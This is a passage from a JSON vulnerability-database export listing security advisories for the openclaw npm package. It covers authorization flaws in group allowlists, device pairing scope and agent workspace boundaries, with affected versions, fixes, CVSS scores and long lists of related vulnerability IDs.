ility":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-5r8f-96gm-5j6g"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k5da-7tht-w3bs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91430?format=json","vulnerability_id":"VCID-k7fe-dqzc-kbcm","summary":"OpenClaw's Zalouser allowlist authorization matched mutable group names by default\n### Summary\n\nOpenClaw's Zalouser allowlist mode accepted mutable group names and normalized slugs as authorization matches instead of requiring stable group IDs. In deployments that used name-based `channels.zalouser.groups` entries together with permissive sender allowlists, a different group could be accepted by reusing the same display name as an allowlisted group.\n\n### Impact\n\nThis weakened channel authorization for Zalouser group routing and could allow messages from an unintended group to reach the agent when operators relied on group names instead of stable IDs.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. Allowlist authorization now matches stable group identifiers, and users should update to `2026.3.12` or later.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f5mf-3r52-r83w","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f5mf-3r52-r83w"},{"reference_url":"https://github.com/advisories/GHSA-f5mf-3r52-r83w","reference_id":"GHSA-f5mf-3r52-r83w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f5mf-3r52-r83w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-f5mf-3r52-r83w"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k7fe-dqzc-kbcm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89025?format=json","vulnerability_id":"VCID-k8s8-zjv4-gqdb","summary":"OpenClaw: Paired-device pairing actions were not limited to the caller device\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nA paired device session with limited pairing scope could enumerate global pairing state and act on pairing requests that belonged to another device within the same gateway scope ceiling.\n\nThis is a same-gateway paired-device authorization bug, not a remote unauthenticated issue. Severity is low.\n\n## Fix\n\nPairing management actions are now limited to the caller device, so non-admin paired-device sessions cannot approve or operate on unrelated pending device requests.\n\nFix commit:\n\n- `5a12f30441d5b0b151f550daa2c5c9e8db61e2e6`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5a12f30441d5b0b151f550daa2c5c9e8db61e2e6","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/5a12f30441d5b0b151f550daa2c5c9e8db61e2e6"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xrq9-jm7v-g9h7","reference_id":"","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xrq9-jm7v-g9h7"},{"reference_url":"https://github.com/advisories/GHSA-xrq9-jm7v-g9h7","reference_id":"GHSA-xrq9-jm7v-g9h7","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xrq9-jm7v-g9h7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["GHSA-xrq9-jm7v-g9h7"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k8s8-zjv4-gqdb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91202?format=json","vulnerability_id":"VCID-kcba-tshp-77d6","summary":"OpenClaw: Gateway `agent` calls could override the workspace boundary\n### Summary\n\nThe public gateway `agent` RPC allowed an authenticated operator with `operator.write` to supply attacker-controlled `spawnedBy` and `workspaceDir` values. That let the caller re-root the agent run outside its configured workspace boundary.\n\n### Impact\n\nA non-owner operator could escape the intended workspace boundary and run normal file and exec tools from an arbitrary process-accessible directory.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.8`\n\n### Patch\n\nFixed in `openclaw` `2026.3.11` and included in later releases such as `2026.3.12`. The gateway now enforces the configured workspace boundary for agent runs regardless of caller-supplied overrides.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2rqg-gjgv-84jm","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2rqg-gjgv-84jm"},{"reference_url":"https://github.com/advisories/GHSA-2rqg-gjgv-84jm","reference_id":"GHSA-2rqg-gjgv-84jm","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2rqg-gjgv-84jm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv